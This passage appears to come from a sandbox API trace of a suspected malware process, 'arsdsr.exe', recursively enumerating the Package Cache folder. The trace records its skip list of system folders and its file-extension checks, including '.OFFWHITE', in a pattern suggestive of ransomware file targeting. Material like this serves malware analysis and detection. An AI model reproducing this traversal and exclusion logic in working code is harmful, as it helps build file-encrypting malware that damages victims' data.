(lpString1="packages", lpString2="..") returned 1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.438] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.438] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\" [0148.438] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages" [0148.439] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\" [0148.439] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\" [0148.439] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" [0148.439] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0148.439] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.439] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0148.439] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.439] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.439] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="...") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="windows") returned -1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$recycle.bin") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="rsa") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ntuser.dat") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="programdata") returned 1 [0148.439] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="appdata") returned 1 [0148.440] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="program files") returned 1 [0148.440] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="program files (x86)") returned 1 [0148.440] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\" [0148.440] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0148.440] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" [0148.440] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" [0148.440] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0148.440] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0148.441] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.441] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0148.441] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.441] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.441] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c0e500, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd3c0e500, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd3c0e500, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0148.441] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0148.442] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0148.442] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" [0148.442] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0148.442] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.442] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.442] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0148.442] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0148.442] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0148.442] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0148.442] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeab3900, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfeab3900, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfeab3900, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="..") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="...") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="windows") returned -1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="$recycle.bin") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="rsa") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ntuser.dat") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="programdata") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="appdata") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="program files") returned 1 [0148.442] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="program files (x86)") returned 1 [0148.442] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\" [0148.442] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\", lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned="C:/Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" [0148.442] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0148.443] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0148.443] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0148.443] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0148.443] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeab3900, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfeab3900, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfeab3900, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xc200c0, dwReserved1=0x295dcf0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0148.443] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0148.443] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb000ae, dwReserved1=0x295e370, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0148.443] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0148.443] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0148.443] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0148.444] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2=".") returned 1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="..") returned 1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="...") returned 1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="windows") returned -1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="$recycle.bin") returned 1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="rsa") returned -1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="ntuser.dat") returned -1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="programdata") returned -1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="appdata") returned -1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="program files") returned -1 [0148.444] lstrcmpiW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="program files (x86)") returned -1 [0148.444] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0148.444] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0148.444] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\" [0148.444] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\" [0148.444] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*" [0148.444] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0148.445] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0148.445] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0148.445] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0148.445] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0148.445] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0148.445] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0148.445] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0148.446] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0148.446] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\" [0148.446] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages" [0148.446] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\" [0148.446] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\" [0148.446] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" [0148.446] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, 